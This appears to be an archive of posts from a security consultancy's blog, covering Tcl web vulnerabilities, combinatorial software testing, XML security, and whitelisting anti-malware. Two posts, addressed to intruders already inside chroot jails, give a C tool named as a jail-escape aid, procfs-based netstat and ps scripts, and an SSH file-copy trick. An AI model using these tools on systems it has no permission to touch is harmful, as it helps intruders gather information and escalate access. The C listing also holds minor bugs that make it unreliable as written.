=3.Mar.2011= [Thu] at [23:12] · Filed under 0day, Author: Derek Callaway, cansecwest, Digital Security, Exploits, fuzz testing, Software Assurance ·Tagged academic, analysis, application, assurance, blog, cansecwest, cgi, cloud, command, computing, development, exploitation, exploits, free, http, issues, language, license, network, newsgroup, objectives, private, problems, programming, protocol, public, regfuzz, research, scientific, security, software, solution, staff, tcl, testing, theory, tickling, tk, tool, toolkit, total, usenet, vancouver, vulnerabilities, web, whitepaper

Tcl/Tk
Ah, TCL, the Tool Command Language. Based on the research conducted by myself and my colleagues here at Security Objectives (most notably Shane Macaulay,) we have concluded that Tcl has a multitude of security issues, especially when being used in a network environment; and contemporarily speaking, network usage is almost unavoidable. In essence, we are urging the use of extreme caution in Tcl-based web development–whether it’s being used directly or indirectly. To generalize, we also advise against using Tcl for any network application or protocol (not just HTTP.) Security Objectives has published an in-depth analysis of practical Tcl vulnerabilities. The whitepaper, entitled “Tickling CGI Problems”, outlines the theoretical backbone of the phenomena in the first half and presents cases of real-world exploitation in the second half. However, the background theory along with some general programming and Hyper-Text Transfer Protocol knowledge is recommended in order to gain a firm understanding of the exploits themselves.
This is not to say that Tcl should not be used ever, so as a disclaimer we are not advocating any programming language over another. Our position is that the traditional approach to web security with Tcl has much room for improvement. Like any other programming language it works nicely in certain areas such as academic research, scientific computing, extensions, and software testing. With that being said, one project that comes to mind is regfuzz, a regular expression fuzzer written in Tcl which is quite useful. The distinction here is that regfuzz is not intended to be exposed to a public (or even a private) network. Surely, Safe-Tcl could successfully serve network clients in a hardened production environment given that assessed risks were rated low enough to suffice as acceptable. The problem is, that’s not the type of operations that occur in practice as evidenced by an overwhelming majority of cases.
The vulnerabilities exposed by the whitepaper affect TclHttpd, Lyris List Manager, cgi.tcl (which also uses Expect) as well as the Tcl language itself and interpreters thereof. Some of the attack methodologies and vulnerabilities identified are new to the public. Others are similar to well-known attacks or simply subversions of previous security patches, e.g. CVE-2005-4147. As time unfolds, there will surely be a surge in publicized Tcl weaknesses due to the research which is elaborated on within the whitepaper. If you’re interested in discovering vulnerabilities in Tcl software yourself, then there’s a grand list of references to Tcl-related things at http://www.tcl.tk/resource_dump.html. There is also a USENET newsgroup dedicated to it which is naturally called comp.lang.tcl.
For those of you attending CanSecWest 2011 in Vancouver, we are sponsoring the event. Professionals from Security Objectives will be in attendance to answer your queries regarding Tcl/Tk security or other areas of specialized research (information assurance, software assurance, cloud security, etc.) Of course, our professionals will also be available to field questions regarding Security Objectives’ product and service offerings as well. In addition, CanSecWest 2011 attendees receive special treatment when purchasing licenses for BlockWatch, the complete solution to total cloud security.
Like this:
Like Loading...
Permalink
=5.Sep.2010= [Sun] at [21:25] · Filed under Author: Derek Callaway, Digital Security, Misceallaneous, Systems Theory ·Tagged aliases, bash, binary, C, clipboard, code, commands, compile, copy, CSS, directories, distributions, EOF, extension, fileutils, font, gnu, install, Interix, Linux, loops, mainstream, misconfigured, multi-threaded, netstat, operating, parallel, parsing, Perl, perlcc, procfs, root, scripts, shell, statement, SUA, system, text, uptime, version, WordPress, xargs
It’s been a while, but that doesn’t necessarily mean it was vaporware! 😉 As promised in Part 1, the system call tool that mimicks GNU fileutils commands is in the code listing below. Support for any additional commands is welcome; if anybody adds more feel free to e-mail your source code. Extension should be fairly straightforward given then “if(){}else if{}else{}” template. Just simply add another else-if code block with appropriate command line argument parsing. It’s too bad you can’t really do closures in C, but a likely approach to increasing this tool’s modularity is the use of function pointers. Of course new commands don’t have to be from GNU fileutils–mixing and matching Linux system calls in C has limitless possibilities.
Speaking of GNU, I stumbled across an extremely useful GNU project called parallel. Essentially, it’s a multi-threaded version of xargs(1p). I’ve been including it in a lot of bash scripts I’ve written recently. It doesn’t seem to be part of the default install for any operating system distributions, yet; maybe when it evolves into something even more awesome it’ll become mainstream. 🙂 Suprisingly, I was even able to compile it on SUA/Interix without any problems. The only complaint I have about it is the Perl source language (not that I have anything against Perl). I simply feel that the parallelization processes could be that much faster if written in C. Maybe I’ll perlcc(1) it or something. Okay, then–without any further adieu, here’s the code for syscaller:
/*
* syscaller v0.8a - breaking out of chroot jails "ex nihilo"
*
* by Derek Callaway <decal@security-objectives.com>
*
*
* Executes system calls instead of relying on programs from the
* GNU/Linux binutils package. Can be useful for breaking out of
* a chroot() jail.
*
* compile: gcc -O2 -o syscaller -c syscaller.c -Wall -ansi -pedantic
* copy: cat syscaller | ssh -l user@host.dom 'cat>syscaller'
*
* If the cat binary isn't present in the jail, you'll have to be more
* creative and use a shell builtin like echo (i.e. not the echo binary,
* but bash's internal implementation of it.)
*
* Without any locally accessible file download programs such as:
* scp, tftp, netcat, sftp, wget, curl, rz/sz, kermit, lynx, etc.
* You'll have to create the binary on the target system manually.
* i.e. by echo'ing hexadecimal bytecode. This is left as an exercise
* to the reader.
*
* to the reader.
*
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<ctype.h>
#define _GNU_SOURCE 1
#define _USE_MISC 1
#include<unistd.h>
#include<sys/syscall.h>
#include<sys/types.h>
#include<pwd.h>
#include<grp.h>
int syscall(int number, ...);
/* This is for chdir() */
#define SHELL_PATHNAME "/bin/sh"
static void usage(char **argv)
{
printf("usage: %s syscall arg1 [arg2 [...]]\n", *argv);
printf("help: %s help\n", *argv);
exit(EXIT_FAILURE);
}
static void help(char **argv)
{
puts("syscaller v0.8a");
puts("=-=-=-=-=-=-=-=");
puts("");
puts("SYSCALLER COMMANDS");
puts("");
puts("chmod mode pathname");
puts("chdir pathname");
puts("chown user group pathname");
puts("mkdir pathname mode");
puts("rmdir pathname");
puts("touch pathname mode");
puts("");
puts("Note: modes are in octal format (symbolic modes are unsupported)");
puts("Note: some commands mask octal mode bits with the current umask value");
puts("Note: creat is an alias for touch");
puts("");
puts("USEFUL SHELL BUILTINS");
puts("");
puts("ls -a / (via brace/pathname expansion): echo /{.*,*}");
exit(EXIT_SUCCESS);
}
int main(int argc, char *argv[])
{
register char *p = 0;
signed auto int r = 1;
if(argc < 2)
usage(argv);
/* I prefer to avoid strcasecmp() since it's not really standard C. */
for(p = argv[1];*p;++p)
*p = tolower(*p);
do
{
if(!strcmp(argv[1], "chmod") && argc >= 4)
{
/* decimal to octal integer conversion */
const mode_t m = strtol(argv[2], NULL, 8);
r = syscall(SYS_chmod, argv[3], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s, %d) => %d\n", SYS_chmod, argv[3], m, r);
#endif
}
else if((!strcmp(argv[1], "chdir") || !strcmp(argv[1], "cd")) && argc >= 3)
{
static char *const av[] = {SHELL_PATHNAME, NULL};
auto signed int r2 = 0;
r = syscall(SYS_chdir, argv[2]);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s) => %d\n", SYS_chdir, argv[2], r);
#endif
/* This is required because the new current working directory isn't
* bound to the original login shell. */
printf("[%s] exec'ing new shell in directory: %s\n", *argv, argv[2]);
r2 = system(av[0]);
printf("[%s] leaving shell in child process\n", *argv);
if(r2 < 0)
r = r2;
}
else if(!strcmp(argv[1], "chown") && argc >= 5)
{
struct passwd *u = NULL;
struct group *g = NULL;
if(!(u = getpwnam(argv[2])))
break;
#ifdef DEBUG
fprintf(stderr, "getpwnam(%s) => %s:%s:%d:%d:%s:%s:%s\n", argv[2], u->pw_name, u->pw_passwd, u->pw_uid, u->pw_gid, u->pw_gecos, u->pw_dir, u->pw_shell);
#endif
if(!(g = getgrnam(argv[3])))
break;
#ifdef DEBUG
fprintf(stderr, "getgrnam(%s) => %s:%s:%s:%s:", argv[3], g->gr_nam, g->gr_passwd, g->gr_gid);
if((p = g->gr_mem))
while(*p)
{
fputs(p, stderr);
p++;
if(*p)
fputc(',', stderr);
}
#endif
r = syscall(SYS_chown, argv[4], u->pw_uid, g->gr_gid);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %d, %d, %s) => %d\n", SYS_chown, u->pw-uid, g->gr_gid, argv[4], r);
#endif
}
else if((!strcmp(argv[1], "creat") || !strcmp(argv[1], "touch")) && argc >= 4 )
{
const mode_t m = strtol(argv[3], NULL, 8);
r = syscall(SYS_creat, argv[2], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %S, %d) => %d\n", SYS_creat, argv[2], m, r);
#endif
}
else if(!strcmp(argv[1], "mkdir") && argc >= 4)
{
const mode_t m = strtol(argv[3], NULL, 8);
r = syscall(SYS_mkdir, argv[2], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %S, %d) => %d\n", SYS_mkdir, argv[2], m, r);
#endif
}
else if(!strcmp(argv[1], "rmdir") && argc >= 3)
{
r = syscall(SYS_rmdir, argv[2]);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %S) => %d\n", SYS_rmdir, argv[2], r);
#endif
}
else if(!strcmp(argv[1], "help"))
help(argv);
else
usage(argv);
break;
} while(1);
perror(argv[1]);
exit(r);
}
Please note that some of the lines of code in this article are truncated due to how WordPress’s CSS renders the font text. Although, you’ll still receive every statement in its entirety when you copy it to your clipboard. The next specimen is similar to the netstat emulating shell script from Part 1. It loops through the procfs PID number directories and parses their contents to make it look like you’re running the actual /bin/ps, even though you’re inside a misconfigured root directory that doesn’t have that binary. It also has some useful aliases and a simple version of uptime(1).
#!/bin/bash
# ps.bash by Derek Callaway decal@security-objectives.com
# Sun Sep 5 15:37:05 EDT 2010 DC/SO
alias uname='cat /proc/version' hostname='cat /proc/sys/kernel/hostname'
alias domainname='cat /proc/sys/kernel/domainname' vim='vi'
function uptime() {
declare loadavg=$(cat /proc/loadavg | cut -d' ' -f1-3)
let uptime=$(($(awk 'BEGIN {FS="."} {print $1}' /proc/uptime) / 60 / 60 / 24 ))
echo "up $uptime day(s), load average: $loadavg"
}
function ps() {
local file base pid state ppid uid
echo 'S USER UID PID PPID CMD'
for file in /proc/[0-9]*/status
do base=${file%/status} pid=${base#/proc/}
{ read _ st _; read _ ppid; read _ _ _ _ uid; } < <(egrep '^(State|PPid|Uid):' "$file")
IFS=':' read user _ < <(getent passwd $uid) || user=$uid
printf "%1s %-6s %5d %5d %5d %s\n" $st $user $uid $pid $ppid "$(tr \ \ <"$base/cmdline")"
done
}
#EOF#
Like this:
Like Loading...
Permalink
=14.Feb.2010= [Sun] at [21:34] · Filed under Author: Derek Callaway, Digital Security, Exploits, Misceallaneous, Systems Theory ·Tagged access, account, administrators, attack, bash, binary, chmod, chown, chroot, configuration, containers, context, daemon, directory, elf, environment, escalation, filesystem, fileutils, gnu, hackers, internet, kernel, libraries, manual, memory, netstat, network, noexec, oracle, overflow, pathnames, phrack, privilege, processes, procfs, scp, script, sftp, shell, shellcode, solaris, ssh, stack, sun, tcp, twitter, udp, vulnerable, zones
The content of this blog post is intended for the hackers that have found themselves frustrated as a result of privilege escalation difficulties in the context of a chroot(2) jail environment. Such a situation can occur because of shell account access where the environment or shell itself have been restricted, successfully executing shellcode via overflow in the context of a network daemon, etc. Before I begin, I’d just like to mention that newer versions of Sun Microsystems’ Solaris (now, the Oracle Solaris operating system) Containers, also known as zones serve similar purpose to chroot prisons. Also, I won’t be discussing kernel space memory corruption as a means of subverting a jail; this subject was touched upon in a Phrack article entitled Smashing The Kernel Stack For Fun And Profit (P60-6).
First, I’d like to state that sometimes much information can be gathered simply by looking around the jailed directory hierarchy, since system administrators occasionally copy files from the real root filesystem into the jail. For example, /etc/ld.so.cache may contain pathnames to libraries that exist in the real root, allowing network daemons and other programs that are dynamically linked with vulnerable libraries to be targeted.
Second, it is not entirely uncommon for procfs to be mounted at the usual /proc location within the jail since it’s a prerequisite for many useful utilities. This allows more information to be gathered such as network configuration settings, Internet connections, running processes, and more.. For example, information displayed by netstat(8) can be gleaned from /proc/net/tcp and /proc/net/udp even though the netstat binary may not exist in the chroot environment. The bash shell script below demonstrates this ability:
#!/bin/bash
# netstat.bash by Derek Callaway <decal@security-objectives.com>
# Sun Feb 14 15:56:26 EST 2010 DC/SO
function netstat()
{
echo 'Active Internet connections (w/o servers)'
echo -e 'Proto\tLocal Addr\t\tForeign Addr'
while read -r sl la ra st tx rx tr tm rn smt uid
do if [ $sl == 'sl' ];then continue;fi
l1=${la:0:2}&&l2=${la:2:2}&&l3=${la:4:2}&&l4=${la:6:2}&&li=${la:10:4}
r1=${ra:0:2}&&r2=${ra:2:2}&&r3=${ra:4:2}&&r4=${ra:6:2}&&ri=${ra:10:4}
fmt="tcp\t%u.%u.%u.%u:%u\t%u.%u.%u.%u:%u\n"
if [ $r1 == '00' ];then fmt="tcp\t%u.%u.%u.%u:%u\t\t%u.%u.%u.%u:%u\n";fi
printf $fmt 0x$l4 0x$l3 0x$l2 0x$l1 0x$li 0x$r4 0x$r3 0x$r2 0x$r1 0x$ri
done < /proc/net/tcp
# Replace with /proc/net/udp to view UDP info
If the chmod binary is not present in the jail then you can make the script usable by simply running: bash script.sh, source script.sh, . script.sh, etc. These commands will work even if the /home directory is mounted with the noexec option since bash (or whatever shell you’re using) must be in a directory on a partition that allows execution such as /bin. Of course, you’re out of luck in that particular scenario if you want to execute an ELF binary under $HOME, although some combination of indirect attack techniques may still lead to the desired effect.
Similarly, a makeshift route(8) script can be created to display information about the IP routing table which is accessible through /proc/net/route. Lots of useful information can be gathered from procfs in this manner. Refer to the manual pages and /usr/src/linux/Documentation/filesystems/proc.txt for many more possibilities.
If file transfer services such as SCP and (S)FTP are not configured for the prison, then binary files can still be copied to the target system. If SSH access is available then cat file.bin | ssh -l user@host.dom ‘cat>file.bin’ will suffice. If SSH is not an option, then it shouldn’t be very difficult to write a script locally that converts the file contents to hexadecimal and provides the needed echo -ne ‘\x90’ styled commands which will construct the file auto-magically on the remote system.
In the second part of this blog duo I will provide the source code to a custom job shell that has built-in commands based on system call prototypes in order to circumvent the absence of important commands from packages like GNU fileutils, i.e. chmod(1), chown(1), and others. I’ll be demonstrating another shell script that takes advantage of procfs presence as well so check back soon for more useful tidbits. You can find notifications of new System of Systems blog postings on our Twitter feed, @secobjs.
Like this:
Like Loading...
Permalink
=25.Sep.2009= [Fri] at [0:40] · Filed under Author: Derek Callaway, combinatorics, Digital Security, Discrete Mathematics, fuzz testing, Security Industry, Software Assurance, Systems Theory ·Tagged 2-exptime, active, aerospace, algorithmic, analysis, array, assurance, augment, bell, binary, binomial, blockwatch, bob, bugs, code, coefficient, complexities, concurrency, conditions, covering, curve, desktop, device, dynamic, earth, error, evaluation, factorial, feynman, functional, generator, halting, hardcore, hidden, instrumentation, inventions, issues, jenkins, jenny, linear, machine, mccarthy, molecular, nist, pairwise, pcp, perfection, polynomial, preconditions, problem, quality, quantum, race, research, samate, scientists, sequences, silicon, software, steering, stress, testing, turing, universal, vulnerabilities

binomial coefficients
..binomial coefficients?! That’s right. I’ve found the web site of a Mr. Bob Jenkins with an entire page dedicated to a pairwise covering array generator named jenny.c. I’m fairly sure that only the most hardcore of the software testing weenies have some notion of what those are so for the sake of being succinct I’ll be providing my own explanation here: A pairwise covering array generator is a program for silicon computing machines that deduces sequences of input value possibilities for the purposes of software testing; and yes, I did say silicon computers–since testing their software is really a question of the great Mr. Turing’s halting problem, the existence of a practical, affordable, and efficient nano/molecular computing device such as a DNA computer, Feynman machine, universal quantum computer, etc. would essentially predicate a swift solution to the problem of testing contemporary computer software in non-deterministic polynomial time. The only problem we would have then is how to test those fantastic, futuristic, (seemingly science fictive) yet wondrous problem-solving inventions as they break through laborious barriers of algorithmic complexities that twentieth century computer scientists could have only dreamed about: PCP, #P, PSPACE-complete, 2-EXPTIME and beyond.. The stuff that dreams are made of.
Now, let’s return to Earth and learn about a few things that make Jenny so special. Computer scientists learned early on in their studies of software testing that pairwise or test cases with two input values were the most likely to uncover erroneous programming or “bugs.” Forget the luxury of automation for a minute, old school programmers typed input pairs manually to test their own software. Code tested in that manner was most likely some sort of special-purpose console mode utility. (Celsius to Fahrenheit, anyone?) As the computing power of the desktop PC increased according to Moore’s law, it became time-effective to write a simple program to generate these input pairs instead of toiling over it yourself–I suppose not testing at all was another option. Today, still some software is released to market after only very minor functional and/or quality assurance testing. Regression, stress, security, and other forms of testing cost money and reduce time to market, but in reality significant return on investment acts as a hedge against any losses incurred. Even ephemeral losses justify the absolute necessity of these expenditures.
A Jenny built in modern times undoubtedly has the power to deductively prove that a software product of the eighties decade is comprised of components (or units) that are fundamentally error-free. However, the paradox remains that improvements in automated software testers share a linear relationship with improvements of software in general. Thus, pairwise has become “n-way” which describes the process of utilizing greater multiples of input values in order to cover acceptable numbers of test cases. The number of covering arrays generated in this fashion grows exponentially and can be calculated as a binomial coefficient (see formula below.)

(n choose r) in factorial terms
According to Paul Black, former SAMATE (Software Assurance Metrics and Tool Evaluation) project leader, researchers at NIST have pegged 6-way as the magic number for optimal fault interaction coverage (notably Rick Kuhn and Dolores Wallace.) This conclusion is based on hard evidence from studies on real-world software scenarios including medical devices and the aerospace industry. However, it would not surprise me to see this approximation rise significantly in the coming decades, just as the paradoxical relationship between general-purpose software and automated software testing programs shifts itself in accordance with Moore’s law. If not by Moore, then by some other axiom of metric progression such as Rogers’ bell curve of technological adoption.
I’ve also got a hunch that the tiny percentage of bugs in that “n is arbitrarily greater than 6” range are some of the most critical, powerfully impacting software vulnerabilities known to man. They lie on an attack surface that’s almost non-existent; this makes them by definition, obscure, non-obvious, shadowy, and hidden. Vulnerabilities in this category are the most important by their very nature. Therefore, detecting vulnerabilities of this type will involve people and tools that are masters of marksmanship and artistic in their innovation. Research in this area is entering a steadfast beginning especially within the realms of dynamic instrumentation or binary steering, active analysis, fault propagation, higher-order preconditions/dependencies, concurrency issues, race conditions, etc. I believe that combining merits inherent in various analysis techniques will lead to perfection in software testing.
For perfection in hashing, check out GNU’s gperf, read how Bob used a perfect hashing technique to augment Jenny’s n-tuples; then get ready for our Big ßeta release of the BlockWatch client software (just in time for the holiday season!)
Like this:
Like Loading...
Permalink
=22.May.2009= [Fri] at [16:41] · Filed under Author: Derek Callaway, Misceallaneous, Windows ·Tagged ads, amaya, api, applications, atom, attribute, biztalk, brown, charlie, chromium, dereference, dime, element, encryption, engines, exefilter, exif, explorer, expressions, extensible, firefox, format, functions, good, google, grief, header, http, ie8, images, indexing, ipv6, konqueror, lagadec, libgd, libmagick, lynx, macos, markup, middleware, multipart, navigator, netmask, netscape, new york, opera, oslo, request, resource, rest, ria, rss, safari, sax, security, shellcode, signature, silverlight, smuggling, soap, standards, syndication, tcp, thumbnail, tomcat, transform, twits, uri, validation, w3m, wcf, weblogic, win32, ws-security, xaml, xerces, xml, xml-dsig, xpath

It’s been a little while since we last posted so I wanted to get a blog out there so everybody knows we’re still alive! We just finalized the XML schema for our soon to be released BlockWatch product so with all the XML tags, elements, attributes, and such running through my head I figured I’d blog about XML security. I’m sure the majority of penetration testers out there routinely test for the traditional web application vulnerabilities when looking at Web Services. The same old authentication/authorizations weaknesses, faulty encoding/reencoding/redecoding, session management issues, et al. are still all there and it’s not uncommon for a SOAP Web Service to hand off an attack string to some middleware app that forwards it on deep into the internal network for handling by the revered legacy mainframe. Some organizations process so much XML over HTTP that they place XML accelerator devices on their network perimeter. I have a feeling that this trend will increase the amount of private IP web servers that feel the effects of HTTP Request Smuggling.
Additionally, XML parsers that fetch external document references (e.g. remote URI’s embedded in tag attributes) open themselves up to client-side offensives from evil web servers. Crafted file attachments can come in the form of a SOAP DIME element or the traditional multipart HTTP POST file upload. With those things in consideration, Phillippe Lagadec’s ExeFilter talk from CanSecWest 2008 made some pretty good points on why verifying filename extensions and file header contents or magic numbers isn’t always good enough.
The new manifestations of these old problems should be cause for concern but I personally find the newer XML-specific bugs the most exciting. For example: XPath injection, infinitely nesting tags to cause resource exhaustion via a recursive-descent parser, XXE (XML eXternal Entity) attacks, etc.
A single file format for everything is supposed to make things more simple but the lion’s share of real-world implementations over-complicate the fleeting markup language tags to the point where they become a breeding ground for old school exploits and new attack techniques alike–we’re all familiar with the cliche regarding failure of a “system of systems” with too many moving parts. I’ll touch on some more advanced XML attacks later in the post, but first let’s take a step back and remember XML when it still had a fresh beginning.
Towards the end of the twentieth century, when I first started taking notice of all the hype surrounding XML (the eXtensible Markup Language) I held a fairly skeptic attitude towards it as I tend to do with many fledgling technologies/standards. Perhaps I’ve been over-analytical in that respect but look how long it’s taken IPv6 to amass even a minuscule amount of usage! Albeit, a formal data representation grammar certainly was needed in that “dot-bomb” era, a time when mash-up web applications were near impossible to maintain since consistently pattern matching off-site content demanded continuous tweaking of regular expressions, parsers, etc. The so-called browser war of Netscape Navigator vs. Internet Explorer couldn’t have helped things either. If that was a war, then we must be on the brink of browser Armagaeddon now that there’s Chromium, FireFox3, IE8 RTM, Safari4 Beta, Opera, Konqueror, Amaya, w3m, lynx, etc. The good news? We now have Safari for Win32. The bad news? Microsoft no longer supports IE for MacOS..bummer.
I think it’s fairly rational to forecast continued adoption of XML Encryption and WS-* standards for SOAP Web Services that handle business-to-business and other communications protocol vectors. If you’re bored of the same old Tomcat/Xerces, WebLogic/SAX, etc. deployments then prepare for applications written in newer API’s to arrive soon; namely Microsoft WCF and Oslo, the Windows Communication Foundation API and a modeling platform with design tools (respectively.) From the surface of .NET promotional hype it appears as if WCF and Oslo will be synthesized into a suitereminiscent of BizTalk Server’s visual process modeling approach. WCF has commissioned many Web Services standards including WS-Security but of course not all major software vendors are participating in the all of the standards. The crew in Redmond have committed to REST in WCF and it wouldn’t surprise me to see innovative XML communications techniques arising from the combination of Silverlight 3 and .NET RIA Services; for those of you who still don’t know, RIA is an acronym for Rich Internet Applications! Microsoft is leveraging the interoperability of this extensible markup language for the long-proprietary document formats of their Office product suite as part of their Open Specification Promise. Even the Microsoft Interactive Canvas, essentially a table that provides I/O through touch uses a form of XML (XAML) for markup.
Blogosphereans, Security Twits, and other Netizens alike seem to take this Really Simple Syndication thing for granted. Over the past several years or so there’s been a trend of malicious payloads piggybacking on banner ads. Since RSS and Atom are capable of syndicating images as well, I’d like to see a case study detailing the impact of a shellcode-toting image referenced from within an XML-based syndication format. Obvious client-side effects that occur when the end user’s browser renders the image are to be expected (gdiplus.dll, anyone?) What else could be done? Web 2.0 search engines with blog and image search features often pre-process those images into a thumbnail as a part of the indexing process. A little recon might discover the use of libMagick by one and libgd by another. Targeting one specific spiderbot over another could be done by testing the netmask of the source IP address making the TCP connection to the web server or probably even as simple as inspecting the User Agent field in the HTTP request header. Crafting a payload that functions both before and after image resizing or other additional processing (ex. EXIF meta-data removal) would be quite an admirable feat. Notwithstanding, I was quite surprised how much Referer traffic our blog got from images.google.com after Shane included a picture of the great Charlie Brown in his “Good Grief!” post…but I digress.
Several years ago when I was still living in New York, I became fascinated with the subtle intricacies of XML-DSig while studying some WS-Security literature. XML Signature Validation in particular had attracted my attention in earnest. In addition to the characteristics of traditional digital signatures, XML Signatures exhibit additional idiosyncrasies that require a bit of pragmatism in order to be implemented properly and therefore also to be verified properly as well (ex. by a network security analyst.) This is mainly because of the Transform and Reference elements nested within the Signature elements–References and Transforms govern the data to be provided as input to the DigestMethod which produces the cryptic DigestValue string. A Reference element contains a URI attribute which represents the location of the data to be signed. Depending on the type of Transform element, data first dereferenced from the Reference URI is then transformed (i.e. via an XPath query) prior to signature calculation. That’s essentially how it works. Something that may seem awkward is that the XML being signed can remain exactly the same while the digital signature (e.g. the DigestValue element value) has changed. I’ve decided to leave some strange conditions that often come about as an exercise for the reader:
What happens to an XML Digital Signature if … ?
- No resource exists at the location referenced by the Reference element’s URI attribute value.
- A circular reference is formed because a URI attribute value points to another Reference element whose URI attribute value is identical to the first.
- The URI identifies the Signature element itself.
- A resource exists at the URI, but it’s empty.
- The Reference element has a URI attribute value which is an empty string, <Reference URI=””>
Like this:
Like Loading...
Permalink
=11.Feb.2009= [Wed] at [7:05] · Filed under Author: Derek Callaway, Digital Security, Philosophy, Security Industry, Software Assurance, Systems Theory ·Tagged anti-virus, antithesis, autoimmune, biological, blacklist, cansecwest, clone, cloud, digital, ethics, evolution, geopolitical, hash, hegelian, hybrid, malware, management, md5deep, mutation, nsrl, occam, pass, Philosophy, security, signature, sourceboston, synthesis, thesis, vaccine, virii, whitelist
Usually it’s difficult for me to make a correlation between the two primary subjects that I studied in college–computer science and philosophy. The first few things that pop into mind when attempting to relate the two are typically artificial intelligence and ethics. Lately, intuition has caused me to ponder over a direct link between modern philosophy and effective digital security.
More precisely, I’ve been applying the Hegelian dialectic to the contemporary signature-based approach to anti-virus while pontificating with my peers on immediate results; the extended repercussions of this application are even more fascinating. Some of my thoughts on this subject were inspired by assertions of Andrew Jacquith and Dr. Daniel Geer at the Source Boston 2008 security conference. Mr. Geer painted a beautiful analogy between the direction of digital security systems and the natural evolution of biological autoimmune systems during his keynote speech. Mr. Jacquith stated the current functional downfalls of major anti-virus offerings. These two notions became the catalysts for the theoretical reasoning and practical applications I’m about to describe.
Hegel’s dialectic is an explicit formulation of a pattern that tends to occur in progressive ideas. Now bear with me here–In essence, it states that for a given action, an inverse reaction will occur and subsequently the favorable traits of both the action and reaction will be combined; then the process starts over. A shorter way to put it is: thesis, antithesis, synthesis. Note that an antithesis can follow a synthesis and this is what creates the loop. This dialectic is a logical characterization of why great artists are eventually considered revolutionary despite initial ridicule for rebelling against the norm. When this dialectic is applied to anti-virus, we have: blacklist, whitelist, hybrid mixed-mode. Anti-virus signature databases are a form of blacklisting. Projects such as AFOSI md5deep, NIST NSRL, and Security Objectives Pass The Hash are all whitelisting technologies.
A successful hybrid application of these remains to be seen since the antithesis (whitelisting) is still a relatively new security technology that isn’t utilized as often as it should be. A black/white-list combo that utilizes chunking for both is the next logical step for future security software. When I say hybrid mixed-mode, I don’t mean running a whitelisting anti-malware tool and traditional anti-virus in tandem although that is an attractive option. A true synthesis would involve an entirely new solution that inherited the best of each parent approach, similar to a mule’s strength and size. The drawbacks of blacklists and whitelists are insecurity and inconvenience, respectively. These and other disadvantages are destined for mitigation with a hybridizing synthesis.
The real problem with mainstream anti-virus software is that it’s not stopping all of the structural variations in malware. PC’s continue to contract virii even when they’re loaded with all the latest anti-virus signatures. This is analogous to a biological virus that becomes resistant to a vaccine through mutation. Signature-based matching was effective for many years but now the total set of malicious code far outweighs legitimate code. To compensate, contemporary anti-virus has been going against Ockham’s Razor by becoming too complex and compounding the problem as a result. It’s time for the security industry to make a long overdue about-face. Keep in mind that I’m not suggesting that there be a defection of current anti-virus software. It does serve a purpose and will become part of the synthesization I show above.
The fundamental change in motivation for digital offensive maneuvers from hobbyist to monetary and geopolitical warrants a paradigm shift in defensive countermeasure implementation. For what it’s worth, I am convinced that the aforementioned technique of whitelisting chunked hashes will be an invaluable force for securing the cloud. It will allow tailored information, metrics and visualizations to be targeted towards various domain-specific applications and veriticals. For example: finance, energy, government, or law enforcement, as well as the associated software inventory and asset management tasks of each. Our Clone Wars presentation featuring Pass The Hash (PTH) at Source Boston and CanSecWest will elaborate on our past few blog posts and much more.. See you there!
Like this:
Like Loading...
Permalink
=5.Jan.2009= [Mon] at [2:01] · Filed under Author: Derek Callaway, Digital Security, Security Industry, Systems Theory, WPF ·Tagged 25c3, anti-virus, api, automated, cansecwest, database, digital, forensics, gnu, gui, hacking, hash, information, linq, malware, maps, md6, merkle, meta-data, napster, nist, processes, pth, queue, research, rsa, screenshot, sha-3, signature, software, spam, stealth, system, tiger, tree, whitelist, WPF, xml
By now, the security industry must recognize that the future of Message-Digest algorithm 5 is hopelessly jeopardized. The rogue CA certificate presentation at 25C3 might as well have been the nail in the coffin. A little over a year ago, NIST opened up its Cryptographic Hash Algorithm Competition for the creation of SHA-3. In response, Ron Rivest (The ‘R’ in “RSA”) developed MD6 at MIT. Security Objectives’ has been tirelessly working on a little hashing project of its own–Pass The Hash.
The security industry is currently in the process of reluctantly accepting that the current signature-based approach to anti-virus and malware identification is futile. Therefore, our Pass The Hash solution utilizes a whitelist approach in conjunction with a custom hash tree data structure to wholly single out malware variants piece by piece. Moreover, non-disclosure agreements are a besetting factor in digital forensics investigations because the analyst cannot inquire about a malware specimen by sending it out verbatim; our solution solves that problem too.
Here’s how it works: you compute Tiger hashes of files on your system, query our central database, and we tell you what they belong to. If it doesn’t match one of our hashes, you know you’ve got a problem. Once you’ve identified a piece of malware, you can coordinate specifics with our community such as fixes, research, opinions, etc. All of this is in a really sleek WPF GUI because here at Security Objectives, we strive to make hacking look like the movies!
The hash computations that our software performs identify polymorphous variations similar to Context-Triggered Piecewise Hashes and Bloom Filters. There will also be an off-line mode where hashes can be compared against a local client-side database that deals with hash trees similar to our centralized database. Directories, drives, and even processes whose hashes need to be calculated are inserted into a dynamically managed queue; with the click of a button the queue can be re-prioritized, saved, elements can be removed, etc. Meta-data is associated with each hash object that describes attributes such as operating system, platform, user-specified information, etc.
When we first started working on this we were thinking “napster for malware” but it’s turned into so much more. More recently the description was “MRBL” (Malware Real-time Blackhole List,) similar to the MAPS SPAM countermeasure except that it actually utilizes whitelist technology. “malster” sounds cool, but we decided to name it Pass The Hash, indicative of the hash value computation and transmission taking place. This venture is clearly distinguishable from GNU Pth (Portable threads) because our acronym (PTH) is written in all caps. 😉
I can’t provide an exact release date right now–all I can say is very soon. Once it’s released you’ll be able to download it from our products page. The long-term plan is to slap an open source license on the client code, thereby exposing the XML API for the central database and LINQ for the local one. Organizations that require the achievement of total malware sovereignty can deploy a dedicated appliance that acts as a counterpart to the centralized hash database hosted by Security Objectives. So keep your eyes peeled for the upcoming release of Pass The Hash. In the meantime, sneek a peek at a screenshot.
Similar Research:
P.S. After a long hiatus, we plan to be hitting the conference circuit once again to present on the specifics of this new reactive malware eradication technology. We’ve been submitting CFP’s left and right, but you’re most likely to catch up with us at CanSecWest. Hope to see you there!
Like this:
Like Loading...
Permalink
